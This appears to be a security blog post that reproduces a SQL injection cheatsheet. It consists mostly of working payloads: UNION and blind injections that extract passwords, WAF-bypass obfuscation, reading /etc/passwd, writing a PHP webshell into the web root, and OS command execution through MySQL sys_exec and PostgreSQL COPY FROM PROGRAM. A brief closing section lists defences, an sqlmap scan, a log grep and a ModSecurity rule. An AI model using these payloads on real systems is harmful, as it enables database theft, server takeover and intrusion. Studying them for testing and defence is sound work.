Listen to this Post
SQL injection (SQLi) remains one of the most critical vulnerabilities in web applications, allowing attackers to manipulate database queries. Tib3rius provides a comprehensive SQLi cheatsheet that covers various techniques for identifying and exploiting SQL injection vulnerabilities.
🔗 Cheatsheet URL: https://tib3rius.com/sqli
You Should Know:
1. Basic SQL Injection Payloads
- Classic UNION-based SQLi:
' UNION SELECT 1,2,3-- - ' UNION SELECT username,password,NULL FROM users-- -
-
Boolean-Based Blind SQLi:
' OR 1=1-- - ' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='a'-- -
-
Time-Based Blind SQLi:
'; IF (1=1) WAITFOR DELAY '0:0:5'-- - ' OR (SELECT SLEEP(5))-- -
2. Bypassing WAFs (Web Application Firewalls)
-
Obfuscation Techniques:
/<em>!50000SELECT</em>/ * FROM users '//UNION//SELECT//1,2,3-- -
-
Hex Encoding:
0x2720756e696f6e2073656c65637420312c322c332d2d202d
3. Database-Specific Commands
MySQL / MariaDB
SELECT @@version; SELECT user(); SELECT database();
#### **PostgreSQL**
SELECT version(); SELECT current_user; SELECT current_database();
#### **Microsoft SQL Server**
SELECT @@version; SELECT SYSTEM_USER; SELECT DB_NAME();
#### **Oracle**
SELECT banner FROM v$version; SELECT user FROM dual;
### **4. File Operations (If Privileges Allow)**
- Reading Files:
SELECT LOAD_FILE('/etc/passwd'); -- MySQL -
Writing Files (Webshell Upload):
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
### **5. OS Command Execution (If Possible)**
-
MySQL (Using
sys_exec):SELECT sys_exec('id'); -
PostgreSQL:
DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'; SELECT * FROM cmd_exec;
## **What Undercode Say**
SQL injection remains a severe threat due to improper input sanitization. Always use:
– Prepared Statements (Parameterized Queries)
– Stored Procedures
– ORM (Object-Relational Mapping) frameworks
– Input Validation & Output Encoding
### **Defensive Commands & Tools**
- Detect SQLi with
sqlmap:sqlmap -u "http://example.com/page?id=1" --risk=3 --level=5
-
Log Analysis (Linux):
grep -i "union.*select" /var/log/apache2/access.log
-
Block SQLi via ModSecurity (WAF):
SecRule ARGS "@detectSQLi" "deny,log,id:1000"
-
Windows Defender (Block SQLi Patterns in Logs):
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} | Where-Object {$_.Message -match "union.*select"}
Expected Output: A secure web application that filters malicious SQL queries and logs attempted attacks for further analysis.
🔗 Reference: https://tib3rius.com/sqli
References:
Reported By: Tib3rius This – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
